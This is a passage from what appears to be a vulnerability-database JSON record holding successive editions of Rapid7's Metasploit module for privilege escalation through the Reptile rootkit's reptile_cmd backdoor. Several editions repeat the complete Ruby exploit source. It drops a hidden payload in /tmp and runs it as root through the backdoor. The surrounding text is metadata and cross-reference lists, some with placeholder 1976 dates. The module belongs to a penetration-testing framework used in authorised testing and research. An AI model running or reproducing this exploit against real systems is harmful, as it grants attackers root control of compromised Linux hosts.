"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-03T15:03:05", "differentElements": ["sourceData"], "edition": 88}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-03T18:28:26", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/PLAYSMS_TEMPLATE_INJECTION"]}, {"type": "hackerone", "idList": ["H1:837733"]}, {"type": "thn", "idList": ["THN:1D059A29F13AF81A28C2D2770E5CD2E6"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143671", "OPENVAS:1361412562310704650", "OPENVAS:1361412562310892168"]}, {"type": "zdt", "idList": ["1337DAY-ID-34180", "1337DAY-ID-34181", "1337DAY-ID-34186", "1337DAY-ID-34185", "1337DAY-ID-34182"]}, {"type": "exploitdb", "idList": ["EDB-ID:48280"]}, {"type": "threatpost", "idList": ["THREATPOST:CB31619614FD5E23CA0F7DEC57D992BE", "THREATPOST:6423D51E252EC53A6308409E7309A1D4"]}, {"type": "kitploit", "idList": ["KITPLOIT:2402789086774512349"]}, {"type": "mssecure", "idList": ["MSSECURE:B88202FB5B97F91B4C2853079E60CFF1"]}, {"type": "redhat", "idList": ["RHSA-2020:1300", "RHSA-2020:1296", "RHSA-2020:1292"]}], "modified": "2020-04-03T18:28:26"}, "score": {"value": 1.0, "vector": "NONE", "modified": "2020-04-03T18:28:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-03T18:28:26", "differentElements": ["sourceData"], "edition": 89}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-05T14:36:03", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:7919000016883371178", "KITPLOIT:8584280668254005479"]}, {"type": "cve", "idList": ["CVE-2020-11533", "CVE-2020-5348", "CVE-2020-10601", "CVE-2020-7008", "CVE-2020-4273", "CVE-2019-18905", "CVE-2019-18904"]}, {"type": "threatpost", "idList": ["THREATPOST:45008E39E415467C30843E8CE784171C", "THREATPOST:0E97C010C7A2C4BE17668D84A84A813A"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/PLAYSMS_TEMPLATE_INJECTION"]}, {"type": "hackerone", "idList": ["H1:837733"]}, {"type": "thn", "idList": ["THN:1D059A29F13AF81A28C2D2770E5CD2E6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157079"]}, {"type": "nessus", "idList": ["SUSE_SU-2020-0853-1.NASL", "FREEBSD_PKG_9CB57A06751711EAB5943065EC8FD3EC.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143671"]}, {"type": "zdt", "idList": ["1337DAY-ID-34181"]}], "modified": "2020-04-05T14:36:03"}, "score": {"value": 5.2, "vector": "NONE", "modified": "2020-04-05T14:36:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-05T14:36:03", "differentElements": ["modified", "published", "sourceData"], "edition": 90}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-05T18:37:04", "history": [], "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:7919000016883371178", "KITPLOIT:8584280668254005479"]}, {"type": "cve", "idList": ["CVE-2020-11533", "CVE-2020-5348", "CVE-2020-10601", "CVE-2020-7008", "CVE-2020-4273", "CVE-2019-18905", "CVE-2019-18904"]}, {"type": "threatpost", "idList": ["THREATPOST:45008E39E415467C30843E8CE784171C", "THREATPOST:0E97C010C7A2C4BE17668D84A84A813A"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/PLAYSMS_TEMPLATE_INJECTION"]}, {"type": "hackerone", "idList": ["H1:837733"]}, {"type": "thn", "idList": ["THN:1D059A29F13AF81A28C2D2770E5CD2E6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157079"]}, {"type": "nessus", "idList": ["SUSE_SU-2020-0853-1.NASL", "FREEBSD_PKG_9CB57A06751711EAB5943065EC8FD3EC.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704650"]}, {"type": "zdt", "idList": ["1337DAY-ID-34180"]}], "modified": "2020-04-05T18:37:04"}, "score": {"value": 5.8, "vector": "NONE", "modified": "2020-04-05T18:37:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-05T18:37:04", "differentElements": ["modified", "published", "sourceData"], "edition": 91}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-06T20:41:03", "history": [], "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:930E2835F60F5BF9A9AFD19CB790A990"]}, {"type": "threatpost", "idList": ["THREATPOST:2334EE5F6C03FC3ECE377B9BD44BA4E7", "THREATPOST:7C6549527632CA62F37828AF76B7CDC1"]}, {"type": "thn", "idList": ["THN:77AF6C232C47E232F80467A06A58EDA4"]}, {"type": "kitploit", "idList": ["KITPLOIT:5526563032002023677"]}, {"type": "virtuozzo", "idList": ["VZA-2020-025", "VZA-2020-026"]}, {"type": "exploitdb", "idList": ["EDB-ID:48296", "EDB-ID:48291", "EDB-ID:48290", "EDB-ID:48284", "EDB-ID:48288", "EDB-ID:48287", "EDB-ID:48299", "EDB-ID:48286", "EDB-ID:48285", "EDB-ID:48292"]}, {"type": "cert", "idList": ["VU:660597"]}], "modified": "2020-04-06T20:41:03"}, "score": {"value": 3.2, "vector": "NONE", "modified": "2020-04-06T20:41:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-06T20:41:03", "differentElements": ["sourceData"], "edition": 92}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-06T22:31:10", "history": [], "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1295159706914153088"]}, {"type": "threatpost", "idList": ["THREATPOST:DF7C78725F19B2637603E423E56656D4"]}, {"type": "mssecure", "idList": ["MSSECURE:CB9E2AFCFEE40B19C9B7207063F69B6F"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "redhat", "idList": ["RHSA-2020:1353", "RHSA-2020:1352", "RHSA-2020:1344", "RHSA-2020:1351", "RHSA-2020:1378"]}, {"type": "krebs", "idList": ["KREBS:01B0D5F4226C6CFA0B54B0A337862E88"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0467-1", "OPENSUSE-SU-2020:0468-1"]}, {"type": "ics", "idList": ["ICSA-20-098-02"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1335", "ELSA-2020-1331", "ELSA-2020-1318"]}, {"type": "ubuntu", "idList": ["USN-4324-1", "USN-4325-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157126"]}], "modified": "2020-04-06T22:31:10", "rev": 2}, "score": {"value": 1.1, "vector": "NONE", "modified": "2020-04-06T22:31:10", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-06T22:31:10", "differentElements": ["sourceData"], "edition": 93}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-08T10:49:22", "history": [], "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1295159706914153088"]}, {"type": "threatpost", "idList": ["THREATPOST:DF7C78725F19B2637603E423E56656D4"]}, {"type": "mssecure", "idList": ["MSSECURE:CB9E2AFCFEE40B19C9B7207063F69B6F"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "redhat", "idList": ["RHSA-2020:1353", "RHSA-2020:1352", "RHSA-2020:1344", "RHSA-2020:1351", "RHSA-2020:1378"]}, {"type": "krebs", "idList": ["KREBS:01B0D5F4226C6CFA0B54B0A337862E88"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0467-1", "OPENSUSE-SU-2020:0468-1"]}, {"type": "ics", "idList": ["ICSA-20-098-02"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1335", "ELSA-2020-1331", "ELSA-2020-1318"]}, {"type": "ubuntu", "idList": ["USN-4324-1", "USN-4325-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157126"]}], "modified": "2020-04-06T22:31:10", "rev": 2}, "score": {"value": 1.1, "vector": "NONE", "modified": "2020-04-06T22:31:10", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-08T10:49:22", "differentElements": ["modified", "published"], "edition": 94}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "c6af0b24c51a39d8b1daa9f3ec55e638", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-08T18:52:58", "history": [], "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1295159706914153088"]}, {"type": "threatpost", "idList": ["THREATPOST:DF7C78725F19B2637603E423E56656D4"]}, {"type": "mssecure", "idList": ["MSSECURE:CB9E2AFCFEE40B19C9B7207063F69B6F"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "redhat", "idList": ["RHSA-2020:1353", "RHSA-2020:1352", "RHSA-2020:1344", "RHSA-2020:1351", "RHSA-2020:1378"]}, {"type": "krebs", "idList": ["KREBS:01B0D5F4226C6CFA0B54B0A337862E88"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0467-1", "OPENSUSE-SU-2020:0468-1"]}, {"type": "ics", "idList": ["ICSA-20-098-02"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1335", "ELSA-2020-1331", "ELSA-2020-1318"]}, {"type": "ubuntu", "idList": ["USN-4324-1", "USN-4325-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157126"]}], "modified": "2020-04-06T22:31:10", "rev": 2}, "score": {"value": 1.1, "vector": "NONE", "modified": "2020-04-06T22:31:10", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-08T18:52:58", "differentElements": ["modified", "published", "sourceData"], "edition": 95}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-08T22:47:36", "history": [], "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:5797849468549337144"]}, {"type": "threatpost", "idList": ["THREATPOST:DDB85D763AB168B628766E54A0159AE2"]}, {"type": "centos", "idList": ["CESA-2020:1047", "CESA-2020:1036", "CESA-2020:1000", "CESA-2020:1181", "CESA-2020:1068", "CESA-2020:1084", "CESA-2020:1175", "CESA-2020:1172", "CESA-2020:1178", "CESA-2020:1116"]}], "modified": "2020-04-08T22:47:36", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-08T22:47:36", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 